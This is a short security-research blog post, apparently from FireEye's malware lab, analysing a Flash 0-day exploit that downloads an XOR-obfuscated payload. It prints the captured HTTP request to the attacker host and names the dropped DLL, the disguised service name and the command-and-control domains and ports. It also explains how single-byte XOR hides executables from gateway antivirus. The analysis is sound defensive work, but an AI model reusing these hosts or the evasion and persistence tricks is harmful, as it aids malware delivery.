This exploit successfully worked on my VM under Firefox 3.5.1 and Flash player 10.  It worked smoothly and just before FireFox crashed, I saw an outbound communication like this:

GET /images/x/xor.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sorla.us
Connection: Keep-Alive

xor.gif in fact is a single byte XORed version of the original malware binary. The shell code downloads this binary and further XORes the complete gif file with 0x95 to get the final payload. Using very simple XOR obfuscation shows just how easy it is to evade detection by a gateway AV product that is looking for executables on the wire.

Just how quickly AVs are responding to this threat can be surmised by these results...

Here is the B.exe (da0a41f75331d804a85801ac9ac09a26) detection rate so far...

VT report last night

VT report this morning

The detection rate increased from 27.50% to 52.50% overnight.

So what this B.EXE all about...B.exe drops a dll file wmimachine2.dll onto the %system directory and installs it as a service with the name ".NET Runtime Optimization Service v2.086521.BackUp_X86".

It further tries to contact tro2.6600.org and getport.2288.org on TCP port 8080 and 19939. These 2 domains used to map to 218.93.127.157 but it's no longer the case.

Here are the WHOIS records..

In the coming days, once this exploit makes its way onto a public website (as at the time of this writing there is no public PoC exploit), we'll definitely see a massively higher malware count.  The fact that it's a very similar piece of malware attached to this exploit variation alludes to the fact that the PoC details aren't leaking into the malware circles.  Web surfers need to be very careful as these recent 0-days have given attackers the opportunity to exploit any system running the ubiquitous Flash player.

Atif Mushtaq @ FireEye Malware Intelligence Lab

Question/Comments : research SHIFT-2 fireeye DOT COM